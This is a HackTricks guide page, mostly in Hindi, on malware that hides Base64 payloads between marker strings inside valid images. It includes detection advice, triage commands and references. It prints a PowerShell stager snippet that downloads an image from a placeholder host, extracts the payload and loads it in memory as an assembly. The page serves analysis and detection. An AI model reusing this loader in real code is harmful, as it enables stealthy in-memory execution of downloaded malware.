Malware & Network Stego

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Not all steganography is pixel LSB; commodity malware often hides payloads inside otherwise valid files.

व्यावहारिक पैटर्न

Marker-delimited payloads in valid images

यदि कोई इमेज़ डाउनलोड की जाती है और तुरंत किसी स्क्रिप्ट द्वारा text/Base64 के रूप में पार्स की जाती है, तो payload अक्सर pixel-hidden के बजाय marker-delimited होती है।

Commodity loaders अक्सर Base64 payloads को plain text के रूप में अन्यथा वैध इमेज़ (अक्सर GIF/PNG) के अंदर छिपाते हैं। pixel-level LSB के बजाय, payload को फ़ाइल के टेक्स्ट/मेटाडेटा में embedded unique marker strings द्वारा delimit किया जाता है। एक stager तब:

  • HTTP(S) पर इमेज़ डाउनलोड करता है
  • start/end markers का पता लगाता है
  • बीच का टेक्स्ट निकालता है और Base64-decodes करता है
  • in-memory में load/execute करता है

Minimal PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Notes:

  • ATT&CK: T1027.003 (steganography)
  • डिटेक्शन/हंटिंग:
  • डाउनलोड की गई images को delimiter strings के लिए स्कैन करें।
  • ऐसे scripts को फ्लैग करें जो images को fetch करते हैं और तुरंत Base64 decoding routines को कॉल करते हैं (PowerShell FromBase64String, JS atob, आदि)।
  • HTTP content-type mismatches की तलाश करें (image/* response लेकिन body में लंबा ASCII/Base64 हो)।

अन्य high-signal स्थान payloads छिपाने के लिए

ये आम तौर पर content-level pixel stego की तुलना में जांचने के लिए तेज़ होते हैं:

  • मेटाडेटा: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn segments।
  • Trailing bytes: formal end marker के बाद appended डेटा (उदा., PNG IEND)।
  • Embedded archives: loader द्वारा embedded या appended और extracted किया गया ZIP/7z।
  • Polyglots: ऐसी फाइलें जो multiple parsers के तहत valid होने के लिए बनाई गई हों (उदा., image + script + archive)।

Triage commands

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

संदर्भ:

  • Unit 42 उदाहरण: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
  • MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
  • File format polyglots और container tricks: https://github.com/corkami/docs
  • Aperi’Solve (वेब-आधारित stego triage): https://aperisolve.com/

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें